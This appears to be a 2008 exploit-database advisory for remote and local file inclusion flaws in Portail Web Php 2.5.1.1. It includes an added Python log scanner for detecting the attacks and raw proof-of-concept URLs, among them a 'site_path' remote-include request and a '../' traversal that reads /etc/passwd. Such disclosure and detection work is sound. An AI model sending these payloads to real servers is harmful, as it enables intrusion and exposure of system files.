Vendor: Portail Web Php
By: Tryagi
CVSS: 7.5 (HIGH)
Multiple Remote/Local File Inclusion
CWE: 98
Product Name: Portail Web Php
Affected Version From: 2.5.1.1
Affected Version To: 2.5.1.1
Patch Exists: YES
Related CWE: N/A
CPE: a:portail_web_php:portail_web_php:2.5.1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Portail Web Php <= 2.5.1.1 Multiple Remote/Local File Inclusion Vulnerabilities

Portail Web Php version 2.5.1.1 contains multiple remote and local file inclusion vulnerabilities. The remote file inclusion is reached through the 'site_path' parameter of the 'template/Vert/index.php', 'template/Noir/index.php' and 'template/Bleu/index.php' scripts, which can be exploited by sending a malicious URL in that parameter. The local file inclusion is reached through the 'page' parameter of the 'PwP2.5.1.1/' script, which can be exploited by sending a malicious URL in that parameter.

Mitigation:

Upgrade to the latest version of Portail Web Php.
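
To check whether an installation has already received such requests, the added example below (not part of the original advisory or of Portail Web Php) scans web server access logs for the two request patterns described above. It assumes combined log format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Template scripts the advisory names as taking 'site_path'.
TEMPLATE_RE = re.compile(r"/template/(?:Vert|Noir|Bleu)/index\.php$", re.I)
# A value starting with scheme:// or //host points at a remote resource.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format, documentation addresses).
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Feb/2008:10:00:01 +0000] "GET /PwP2.5.1.1/template/Vert/index.php?site_path=http://localhost/020.txt HTTP/1.1" 200 512',
    '203.0.113.7 - - [24/Feb/2008:10:00:05 +0000] "GET /PwP2.5.1.1/?page=../../../../../../../../etc/passwd HTTP/1.1" 200 1843',
    '198.51.100.4 - - [24/Feb/2008:10:01:12 +0000] "GET /PwP2.5.1.1/?page=news HTTP/1.1" 200 4096',
    '198.51.100.4 - - [24/Feb/2008:10:01:15 +0000] "GET /PwP2.5.1.1/template/Noir/index.php HTTP/1.1" 200 2210',
]


def fully_decode(value, rounds=3):
    """Undo nested percent-encoding so an encoded '..' or '://' is still seen."""
    for _ in range(rounds):
        value = unquote(value)
    return value


def classify(target):
    """Return 'RFI', 'LFI' or None for one request target (path?query)."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)  # decodes once
    if TEMPLATE_RE.search(fully_decode(parts.path)):
        if any(REMOTE_RE.match(fully_decode(v)) for v in params.get("site_path", [])):
            return "RFI"
    for raw in params.get("page", []):
        segments = fully_decode(raw).replace("\\", "/").split("/")
        if ".." in segments:  # traversal out of the intended page directory
            return "LFI"
    return None


def scan(log_lines):
    """Return [(verdict, target)] for the lines matching either pattern."""
    targets = (m.group(1) for m in map(REQUEST_RE.search, log_lines) if m)
    return [(v, t) for t in targets if (v := classify(t))]


if __name__ == "__main__":
    for verdict, target in scan(SAMPLE_LOG):
        print(verdict, target)
```

A hit shows only that the request was made; whether the include succeeded depends on the installed version and the PHP configuration.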

Exploit-DB raw data:

### Portail Web Php <= 2.5.1.1 Multiple Remote/Local File Inclusion Vulnerabilities
### http://surfnet.dl.sourceforge.net/sourceforge/portail-web-php/PwP2.5.1.1.rar
### POC :
### I- Remote File Inclusion
### /PwP2.5.1.1/template/Vert/index.php?site_path=http://localhost/020.txt
### /PwP2.5.1.1/template/Noir/index.php?site_path=http://localhost/020.txt
### /PwP2.5.1.1/template/Bleu/index.php?site_path=http://localhost/020.txt
### II- Local File Inclusion
### /PwP2.5.1.1/?page=../../../../../../../../etc/passwd
### I'm Tryagi - Tryag.Cc/cc - Mahmood_ali  :) 

# milw0rm.com [2008-02-24]